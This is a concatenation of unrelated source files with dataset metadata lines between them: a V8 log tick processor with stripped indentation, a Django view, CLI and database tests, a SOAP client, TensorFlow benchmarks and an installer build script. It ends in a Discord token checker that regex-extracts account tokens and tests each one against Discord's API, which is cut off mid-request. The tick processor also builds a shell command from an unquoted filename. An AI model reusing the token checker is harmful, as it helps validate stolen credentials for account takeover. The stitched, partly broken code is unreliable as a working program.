# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Usage: process-ticks.py <logfile>
# Where <logfile> is the log file name (eg, v8.log).
import os, re, sys, tickprocessor, getopt;
class LinuxTickProcessor(tickprocessor.TickProcessor):
def ParseVMSymbols(self, filename, start, end):
"""Extract symbols and add them to the cpp entries."""
pipe = os.popen('nm -n %s | c++filt' % filename, 'r')
try:
for line in pipe:
row = re.match('^([0-9a-fA-F]{8}) . (.*)$', line)
if row:
addr = int(row.group(1), 16)
if addr < start and addr < end - start:
addr += start
self.cpp_entries.Insert(addr, tickprocessor.CodeEntry(addr, row.group(2)))
finally:
pipe.close()
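# Example of an `nm -n | c++filt` line matched by the regex above (hedged):
#   0804a1b0 T v8::internal::Heap::CollectGarbage(int)
# group(1) is the 8-digit hex address, group(2) the demangled symbol name.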
def Usage():
print("Usage: linux-tick-processor.py --{js,gc,compiler,other} logfile-name");
sys.exit(2)
def Main():
# parse command line options
state = None;
try:
opts, args = getopt.getopt(sys.argv[1:], "jgco", ["js", "gc", "compiler", "other"])
except getopt.GetoptError:
    Usage()
# process options.
for key, value in opts:
if key in ("-j", "--js"):
state = 0
if key in ("-g", "--gc"):
state = 1
if key in ("-c", "--compiler"):
state = 2
if key in ("-o", "--other"):
state = 3
# do the processing.
if len(args) != 1:
Usage();
tick_processor = LinuxTickProcessor()
tick_processor.ProcessLogfile(args[0], state)
tick_processor.PrintResults()
if __name__ == '__main__':
Main()
| 37.256098
| 87
| 0.68216
|
794dcf8e928665c70c1d925de63b7567b8085bb2
| 787
|
py
|
Python
|
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | null | null | null |
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | 8
|
2020-06-05T19:40:44.000Z
|
2022-02-26T13:25:34.000Z
|
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | null | null | null |
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from . import models, serializers
class Notifications(APIView):
def get(self, request, format=None):
user = request.user
notifications = models.Notification.objects.filter(to=user)
serializer = serializers.NotificationSerializer(notifications, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
def create_notification(creator, to, notification_type, image=None, comment=None):
notification = models.Notification.objects.create(
creator=creator,
to=to,
notification_type=notification_type,
image=image,
comment=comment,
)
notification.save()
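# A minimal usage sketch (hypothetical objects): record that one user liked
# another user's image.
#
# create_notification(creator=liker, to=image.creator,
#                     notification_type="like", image=image)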
| 24.59375
| 82
| 0.726811
|
794dd0cbdaa93e2af91ed7b66c579171bb48ffd0
| 7,289
|
py
|
Python
|
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | 6
|
2019-12-20T09:12:30.000Z
|
2021-07-08T11:44:55.000Z
|
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | null | null | null |
resto_client_tests/resto_client_cli_test.py
|
CNES/resto_client
|
7048bd79c739e33882ebd664790dcf0528e81aa4
|
[
"Apache-2.0"
] | 1
|
2019-12-17T20:16:39.000Z
|
2019-12-17T20:16:39.000Z
|
# -*- coding: utf-8 -*-
"""
.. admonition:: License
Copyright 2019 CNES
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied. See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import io
from pathlib import Path
import sys
from tempfile import TemporaryDirectory
from typing import List
import unittest
from resto_client.cli.parser.resto_client_parser import build_parser
from resto_client.cli.resto_client_cli import resto_client_run
from resto_client.cli.resto_client_parameters import DOWNLOAD_DIR_KEY
from resto_client.cli.resto_client_settings import RESTO_CLIENT_SETTINGS
from resto_client.cli.resto_server_persisted import (SERVER_KEY, USERNAME_KEY, COLLECTION_KEY,
TOKEN_KEY)
import resto_client.settings.resto_client_config as resto_client_config
class TestRestoClientCli(unittest.TestCase):
"""
Basic Tests Class for resto_client Unit Test
"""
def setUp(self) -> None:
RESTO_CLIENT_SETTINGS.clear()
resto_client_run(['set', 'verbosity', 'DEBUG'])
def assert_not_in_settings(self, settings_key: str) -> None:
"""
Verify that the provided key is absent from the settings.
:param settings_key: name of the key to test
"""
self.assertNotIn(settings_key, RESTO_CLIENT_SETTINGS)
def assert_in_settings(self, settings_key: str) -> None:
"""
Verify that the provided key is present in the settings and different from None.
:param settings_key: name of the key to test
"""
self.assertIn(settings_key, RESTO_CLIENT_SETTINGS)
self.assertIsNotNone(RESTO_CLIENT_SETTINGS[settings_key])
def assert_no_account_in_settings(self) -> None:
"""
Verify that the account related keys are absent from the settings.
"""
self.assert_not_in_settings(USERNAME_KEY)
self.assert_not_in_settings(TOKEN_KEY)
def assert_no_server_in_settings(self) -> None:
"""
Verify that the server related keys are absent from the settings.
"""
self.assert_not_in_settings(SERVER_KEY)
self.assert_not_in_settings(COLLECTION_KEY)
self.assert_no_account_in_settings()
def assert_setting_equal(self, settings_key: str, expected_value: str) -> None:
"""
Verify that the provided key is present in the settings and its value is equal to the
expected one.
:param settings_key: name of the key to test
:param expected_value: expected value of the setting
"""
self.assert_in_settings(settings_key)
self.assertEqual(RESTO_CLIENT_SETTINGS[settings_key], expected_value)
@staticmethod
def get_downloaded_file_path(base_filename: str) -> Path:
"""
        Returns the path in the download directory of a file specified by its basename.
:param base_filename: base file name
:returns: the path to the file
"""
return (Path(RESTO_CLIENT_SETTINGS[DOWNLOAD_DIR_KEY]) /
RESTO_CLIENT_SETTINGS[SERVER_KEY] / base_filename)
def assert_downloaded_file_ok(self, base_filename: str) -> None:
"""
Verify that the download file is correct.
:param base_filename: base file name
"""
downloaded_file_path = self.get_downloaded_file_path(base_filename)
self.assertTrue(downloaded_file_path.is_file(),
'Could not find expected file: {}'.format(str(downloaded_file_path)))
def do_test_download_file(self, command: List[str], expected_files: List[str]) -> None:
"""
Test that the provided command, which is supposed to download one or several files,
succeed in downloading them.
:param command: list of words composing the command
:param expected_files: the base file names of the expected downloaded files
"""
with TemporaryDirectory() as tmp_dir:
resto_client_run(arguments=['set', 'download_dir', tmp_dir])
resto_client_run(arguments=command)
for file_name in expected_files:
self.assert_downloaded_file_ok(file_name)
# verify removing of tmp_dir
self.assertFalse(Path(tmp_dir).is_dir())
@staticmethod
def get_command_output(command: List[str]) -> str:
"""
Runs the specified resto_client command and returns its output
:param command: the command as a list of words
:returns: the command output
"""
previous_stdout = resto_client_config.RESTO_CLIENT_STDOUT
new_stdout = io.StringIO()
resto_client_config.RESTO_CLIENT_STDOUT = new_stdout
resto_client_run(arguments=command)
output = new_stdout.getvalue()
new_stdout.close()
resto_client_config.RESTO_CLIENT_STDOUT = previous_stdout
print(output)
return output.strip()
def print_parser_help(parser: argparse.ArgumentParser, arguments: List) -> None:
"""
Print one help
:param parser: a parser to launch
:param list arguments: in the form [verb, action]
"""
try:
_ = parser.parse_args(arguments + ['--help'])
except SystemExit:
pass
def print_all_help(dict_arguments: dict) -> None:
"""
    Print help for every verb and action combination
:param dict_arguments: verb, action in a dictionary form => verb : list of actions
"""
parser = build_parser()
print_parser_help(parser, [])
for verbe, actions in dict_arguments.items():
print('\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
print(' {} '.format(verbe))
print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
print_parser_help(parser, [verbe])
for action in actions:
if action is not None:
print('\n----------------------------------------------------')
print(' {} {}'.format(verbe, action))
print('----------------------------------------------------')
print_parser_help(parser, [verbe, action])
def main() -> None:
"""
Command line interface to access test to print all help.
"""
settable_options = ['server', 'account', 'collection', 'region', 'download_dir', 'verbosity']
dict_arguments = {'set': settable_options,
'unset': settable_options,
'show': ['settings', 'server', 'collection', 'feature'],
'download': ['product', 'quicklook', 'thumbnail', 'annexes'],
'search': [None],
'configure_server': ['create', 'delete', 'edit', 'show']}
print_all_help(dict_arguments)
if __name__ == "__main__":
sys.exit(main()) # type: ignore
| 38.162304
| 100
| 0.634655
|
794dd121633adfafef9329e0e840cf7cfdc49418
| 2,677
|
py
|
Python
|
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
src/zibalzeep/__main__.py
|
imanashoorii/zibal-zeep
|
9ff7b229b0759597823da41d1dbf48c6e7b5b383
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function
import argparse
import logging
import logging.config
import time
from urllib.parse import urlparse
import requests
from zibalzeep.cache import SqliteCache
from zibalzeep.client import Client
from zibalzeep.settings import Settings
from zibalzeep.transports import Transport
logger = logging.getLogger("zeep")
def parse_arguments(args=None):
parser = argparse.ArgumentParser(description="Zeep: The SOAP client")
parser.add_argument(
"wsdl_file", type=str, help="Path or URL to the WSDL file", default=None
)
parser.add_argument("--cache", action="store_true", help="Enable cache")
parser.add_argument(
"--no-verify", action="store_true", help="Disable SSL verification"
)
parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
parser.add_argument(
"--profile", help="Enable profiling and save output to given file"
)
parser.add_argument(
"--no-strict", action="store_true", default=False, help="Disable strict mode"
)
return parser.parse_args(args)
def main(args):
if args.verbose:
logging.config.dictConfig(
{
"version": 1,
"formatters": {"verbose": {"format": "%(name)20s: %(message)s"}},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"loggers": {
"zeep": {
"level": "DEBUG",
"propagate": True,
"handlers": ["console"],
}
},
}
)
if args.profile:
import cProfile
profile = cProfile.Profile()
profile.enable()
cache = SqliteCache() if args.cache else None
session = requests.Session()
if args.no_verify:
session.verify = False
result = urlparse(args.wsdl_file)
if result.username or result.password:
session.auth = (result.username, result.password)
transport = Transport(cache=cache, session=session)
st = time.time()
settings = Settings(strict=not args.no_strict)
client = Client(args.wsdl_file, transport=transport, settings=settings)
logger.debug("Loading WSDL took %sms", (time.time() - st) * 1000)
if args.profile:
profile.disable()
profile.dump_stats(args.profile)
client.wsdl.dump()
if __name__ == "__main__":
args = parse_arguments()
main(args)
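# Example invocation (hedged):
#   python -m zibalzeep --verbose http://example.com/service?wsdl
# This loads the WSDL (optionally cached and/or profiled) and dumps the
# service description via client.wsdl.dump().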
| 28.784946
| 87
| 0.592081
|
794dd2965690fbe61acdf89fcfecd05fb465748f
| 2,459
|
py
|
Python
|
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | null | null | null |
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | 1
|
2021-06-02T00:58:47.000Z
|
2021-06-02T00:58:47.000Z
|
10_Other/Cuda Benchmarking/1_matrixMul.py
|
Arunken/PythonScripts
|
702d0a3af7a9be3311f9da0afc5285d453f15484
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 14 09:44:05 2018
@author: arken
"""
# ============== no cuda ==================================================
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
import os
os.environ["CUDA_VISIBLE_DEVICES"]="1"
import tensorflow as tf
import time
n = 8000
dtype = tf.float32
with tf.device("/cpu:0"):
matrix1 = tf.Variable(tf.ones((n, n), dtype=dtype))
matrix2 = tf.Variable(tf.ones((n, n), dtype=dtype))
product = tf.matmul(matrix1, matrix2)
config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)))
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
iters = 10
sess.run(product.op)
#file_writer = tf.summary.FileWriter('/path/to/logs', sess.graph)
start = time.time()
for i in range(iters):
sess.run(product.op)
end = time.time()
ops = n**3 + (n-1)*n**2 # n^2*(n-1) additions, n^3 multiplications
elapsed = (end - start)
rate = iters*ops/elapsed/10**9
print('\n %d x %d matmul took: %.2f sec, %.2f G ops/sec' % (n, n,
elapsed/iters,
rate,))
#========================= cuda support =======================================
import os
os.environ["CUDA_VISIBLE_DEVICES"]="1"
import tensorflow as tf
import time
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
n = 8000
dtype = tf.float32
with tf.device("/GPU:0"):
matrix1 = tf.Variable(tf.ones((n, n), dtype=dtype))
matrix2 = tf.Variable(tf.ones((n, n), dtype=dtype))
product = tf.matmul(matrix1, matrix2)
config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)))
with tf.Session(config=config) as sess1:
sess1.run(tf.global_variables_initializer())
iters = 10
start = time.time()
for i in range(iters):
sess1.run(product)
end = time.time()
ops = n**3 + (n-1)*n**2 # n^2*(n-1) additions, n^3 multiplications
elapsed = (end - start)
rate = iters*ops/elapsed/10**9
print('\n %d x %d matmul took: %.2f sec, %.2f G ops/sec' % (n, n,
elapsed/iters,
rate,))
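# Sanity check on the operation count (for n = 8000): n**3 = 5.12e11
# multiplications plus (n-1)*n**2 ≈ 5.119e11 additions, so each matmul is
# roughly 1.02e12 ops; the reported rate is iters*ops/elapsed in G ops/sec.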
| 22.354545
| 127
| 0.581944
|
794dd3ca09ebb3c86926e59925694ad627a865df
| 5,672
|
py
|
Python
|
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/credential_provider/build/make_setup.py
|
sarang-apps/darshan_browser
|
173649bb8a7c656dc60784d19e7bb73e07c20daa
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# This script builds the credential provider installer that is used to install
# all required components of the Google Credential Provider for Windows. The
# installer is a 7-zip self extracting executable file that wraps three main
# parts:
#
# - the Credential Provider COM DLL
# - a DLL that contains Windows EventLog message formatting
# - a setup exe that performs action required during install and uninstall
#
# In this description "installer" refers to the self extracting executable that
# wraps all the parts, whereas "setup" refers to an exe inside the installer
# that runs specific actions at install and uninstall time.
#
# When run, the installer extracts the wrapped files into a new empty
# directory under %TEMP%. The setup exe is then run to register the COM
# objects, install the message format dll, and properly register the credential
# provider with Windows. Once installation completes, the new directory
# containing the extracted files is automatically deleted.
#
# The installer can be run multiple times on the same machine. On an already
# working computer this is essentially a noop. On a damaged computer the files
# will be overwritten and the parts registered, so can be used to correct
# problems.
#
# Running a new version of the installer will replace the existing install with
# a newer one. It is not required to first uninstall the old version.
# Installation of the newer version will attempt to delete older versions if
# possible.
#
# The installer is not needed for uninstall and may be removed after initial
# install. To uninstall the Google Credential Provider for Windows, run the
# setup exe with the command line argument: /uninstall
"""Creates the GCPW self extracting installer. This script is not run manually,
it is called when building the //credential_provider:gcp_installer GN target.
All paths can be absolute or relative to $root_build_dir.
"""
import argparse
import os
import shutil
import subprocess
import sys
def GetLZMAExec(src_path):
"""Gets the path to the 7zip compression command line tool.
Args:
src_path: Full path to the source root
Returns:
The executable command to run the 7zip compressor.
"""
return (os.path.join(src_path, r'third_party\lzma_sdk\7zr.exe')
if sys.platform == 'win32' else '7zr')
def main():
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('src_path', help='Path to the source root')
parser.add_argument('cp_path',
help='Path to the credential provider directory')
parser.add_argument('root_build_path', help='$root_build_dir GN variable')
parser.add_argument('target_gen_path', help='$target_gen_dir GN variable')
args = parser.parse_args()
# Make sure all arguments are converted to absolute paths for use below.
args.src_path = os.path.abspath(args.src_path)
args.cp_path = os.path.abspath(args.cp_path)
args.root_build_path = os.path.abspath(args.root_build_path)
args.target_gen_path = os.path.abspath(args.target_gen_path)
if not os.path.isdir(args.cp_path):
parser.error('Invalid cp_path: "%s"' % args.cp_path)
if not os.path.isdir(args.src_path):
parser.error('Invalid src_path: "%s"' % args.src_path)
# Absolute path to gcp installer.
gcp_installer_fn = os.path.join(args.root_build_path, 'gcp_installer.exe')
gcp_7z_fn = os.path.join(args.root_build_path, 'gcp.7z')
sz_fn = GetLZMAExec(args.src_path)
sfx_fn = os.path.join(args.root_build_path, 'gcp_sfx.exe')
# Build the command line for updating files in the GCP 7z archive.
cmd = [
sz_fn, # Path to 7z executable.
'u', # Update file in archive.
      # The following options are equivalent to -mx9 with bcj2 turned on.
      # Because //third_party/lzma_sdk is only a partial copy of the full sdk
# it does not support all forms of compression. Make sure to use
# compression that is compatible. These same options are used when
# building the chrome install compressed files.
'-m0=BCJ2',
'-m1=LZMA:d27:fb128',
'-m2=LZMA:d22:fb128:mf=bt2',
'-m3=LZMA:d22:fb128:mf=bt2',
'-mb0:1',
'-mb0s1:2',
'-mb0s2:3',
# Full path to archive.
gcp_7z_fn,
]
# Because of the way that 7zS2.sfx determine what program to run after
# extraction, only gcp_setup.exe should be placed in the root of the archive.
# Other "executable" type files (bat, cmd, exe, inf, msi, html, htm) should
# be located only in subfolders.
# Add the credential provider dll and setup programs to the archive.
# If the files added to the archive are changed, make sure to update the
# kFilenames array in setup_lib.cc.
# 7zip and copy commands don't have a "silent" mode, so redirecting stdout
# and stderr to nul.
with open(os.devnull) as nul_file:
os.chdir(args.root_build_path)
subprocess.check_call(cmd + ['gaia1_0.dll'], stdout=nul_file)
subprocess.check_call(cmd + ['gcp_setup.exe'], stdout=nul_file)
subprocess.check_call(cmd + ['gcp_eventlog_provider.dll'], stdout=nul_file)
# Combine the SFX module with the archive to make a self extracting
# executable.
with open(gcp_installer_fn, 'wb') as output:
with open (sfx_fn, 'rb') as input:
shutil.copyfileobj(input, output)
with open (gcp_7z_fn, 'rb') as input:
shutil.copyfileobj(input, output)
return 0
if __name__ == '__main__':
sys.exit(main())
| 38.849315
| 80
| 0.732017
|
794dd45f225b7bc3d2d7a02ac6ed80f2fcd23765
| 7,783
|
py
|
Python
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 478
|
2019-07-31T00:48:11.000Z
|
2022-03-18T09:12:29.000Z
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 47
|
2019-07-28T10:12:22.000Z
|
2022-01-04T16:25:12.000Z
|
tests/test_engine/test_update/test_update_mul.py
|
bobuk/montydb
|
9ee299e7f1d3a7236abb683e0dfe4f7817859b2c
|
[
"BSD-3-Clause"
] | 26
|
2019-08-09T14:28:29.000Z
|
2022-02-22T02:49:51.000Z
|
import pytest
from pymongo.errors import WriteError as mongo_write_err
from montydb.errors import WriteError as monty_write_err
from montydb.types import bson
from ...conftest import skip_if_no_bson
def test_update_mul_1(monty_update, mongo_update):
docs = [
{"a": 1}
]
spec = {"$mul": {"a": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 2}
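# For context (MongoDB $mul semantics, which these tests mirror): the operator
# multiplies a numeric field in place, so {"a": 1} becomes {"a": 2} above;
# applied to a missing field it creates that field with a zero of the
# multiplier's type, hence the 0.0 entries asserted in tests 8-10 below.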
def test_update_mul_2(monty_update, mongo_update):
docs = [
{"a": [1]}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
monty_update(docs, spec)
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_3(monty_update, mongo_update):
docs = [
{"a": 1}
]
spec = {"$mul": {"a": "2"}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
monty_update(docs, spec)
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_4(monty_update, mongo_update):
docs = [
{"a": [1, 2]}
]
spec = {"$mul": {"a.1": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, 4]}
def test_update_mul_5(monty_update, mongo_update):
docs = [
{"a": {"b": 1}}
]
spec = {"$mul": {"a.b": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": {"b": 2}}
def test_update_mul_6(monty_update, mongo_update):
docs = [
{"a": {"b": [1, 2]}}
]
spec = {"$mul": {"a.b.1": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": {"b": [1, 4]}}
def test_update_mul_7(monty_update, mongo_update):
docs = [
{"a": [{"b": 0}, {"b": 1}]}
]
spec = {"$mul": {"a.b": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_8(monty_update, mongo_update):
docs = [
{"a": [{"b": 0}, {"b": 1}]}
]
spec = {"$mul": {"a.3.c": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 0}, {"b": 1}, None, {"c": 0.0}]}
def test_update_mul_9(monty_update, mongo_update):
docs = [
{"a": [1, {"1": 2}, {"1": 3}]}
]
spec = {"$mul": {"a.1.2": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, {"1": 2, "2": 0.0}, {"1": 3}]}
def test_update_mul_10(monty_update, mongo_update):
docs = [
{"a": [1, {"1": 2}]}
]
spec = {"$mul": {"x.1.2": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [1, {"1": 2}], "x": {"1": {"2": 0.0}}}
def test_update_mul_positional_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 3}, {"b": 4}]}
]
spec = {"$mul": {"a.$.b": 2}}
find = {"a.b": 4}
monty_c = monty_update(docs, spec, find)
mongo_c = mongo_update(docs, spec, find)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 3}, {"b": 8}]}
def test_update_mul_positional_all_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 3}, {"b": 4}]}
]
spec = {"$mul": {"a.$[].b": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 6}, {"b": 8}]}
def test_update_mul_positional_filtered_1(monty_update, mongo_update):
docs = [
{"a": [{"b": 4, "c": 1}, {"b": 4, "c": 0}]}
]
spec = {"$mul": {"a.$[elem].b": 2}}
array_filters = [{"elem.c": {"$gt": 0}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [{"b": 8, "c": 1}, {"b": 4, "c": 0}]}
def test_update_mul_positional_filtered_2(monty_update, mongo_update):
docs = [
{"a": [{"b": 4, "c": 1}, {"b": 5, "c": 1}, {"b": 4, "c": 0}]}
]
spec = {"$mul": {"a.$[elem].b": 2}}
array_filters = [{"elem.c": {"$gt": 0}, "elem.b": {"$gt": 4}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [
{"b": 4, "c": 1}, {"b": 10, "c": 1}, {"b": 4, "c": 0}]}
def test_update_mul_positional_filtered_3(monty_update, mongo_update):
docs = [
{"a": [5, 2]}
]
spec = {"$mul": {"a.$[elem]": 10}}
array_filters = [{"elem": {"$lt": 4}}]
monty_c = monty_update(docs, spec, array_filters=array_filters)
mongo_c = mongo_update(docs, spec, array_filters=array_filters)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": [5, 20]}
def test_update_mul_float(monty_update, mongo_update):
docs = [
{"a": 2}
]
spec = {"$mul": {"a": 1.5}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 3.0}
@skip_if_no_bson
def test_update_mul_int64(monty_update, mongo_update):
docs = [
{"a": bson.Int64(2)}
]
spec = {"$mul": {"a": 1.5}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": 3.0}
@skip_if_no_bson
def test_update_mul_decimal128(monty_update, mongo_update):
docs = [
{"a": bson.Decimal128("1.5")}
]
spec = {"$mul": {"a": 2}}
monty_c = monty_update(docs, spec)
mongo_c = mongo_update(docs, spec)
assert next(mongo_c) == next(monty_c)
monty_c.rewind()
assert next(monty_c) == {"a": bson.Decimal128("3.0")}
def test_update_mul_null(monty_update, mongo_update):
docs = [
{"a": None}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_update_mul_bool(monty_update, mongo_update):
docs = [
{"a": True}
]
spec = {"$mul": {"a": 2}}
with pytest.raises(mongo_write_err) as mongo_err:
mongo_update(docs, spec)
with pytest.raises(monty_write_err) as monty_err:
next(monty_update(docs, spec))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
| 25.434641
| 73
| 0.588077
|
794dd51c70497c0d2598e1a62e9984d2bd0cdf61
| 2,817
|
py
|
Python
|
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
Testing/Generator/checker.py
|
PajekRadek/test
|
611b4f990fa7214227ac95d2ba85b0e336cc52d4
|
[
"MIT"
] | null | null | null |
import asyncio
import aiosonic
import re
import os
import time
import threading
from tasksio import TaskPool
from colorama import init, Fore, Back, Style
init(convert=True)
TOKENS_LOADED = 0
TOKENS_INVALID = 0
TOKENS_LOCKED = 0
TOKENS_VALID = 0
TOKENS_VALID_LIST = []
def filter_tokens(unfiltered):
tokens = []
for line in [x.strip() for x in unfiltered.readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
if token not in tokens:
tokens.append(token)
return tokens
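# Usage sketch (illustrative, not part of the original script): filter_tokens
# takes an open file handle and returns de-duplicated matches of the two
# Discord token patterns above, e.g.
#   with open('tokens.txt') as fh:
#       tokens = filter_tokens(fh)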
def title_worker():
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_LOADED
while True:
os.system(f"title Tokens Loaded: {TOKENS_LOADED} ^| Valid: {TOKENS_VALID} ^| Locked: {TOKENS_LOCKED} ^| Invalid: {TOKENS_INVALID}")
time.sleep(0.1)
threading.Thread(target=title_worker, daemon=True).start()
async def check(token, client):
global TOKENS_INVALID, TOKENS_LOCKED, TOKENS_VALID, TOKENS_VALID_LIST
response = await client.get("https://discord.com/api/v9/users/@me/guild-events", headers={
"Authorization": token,
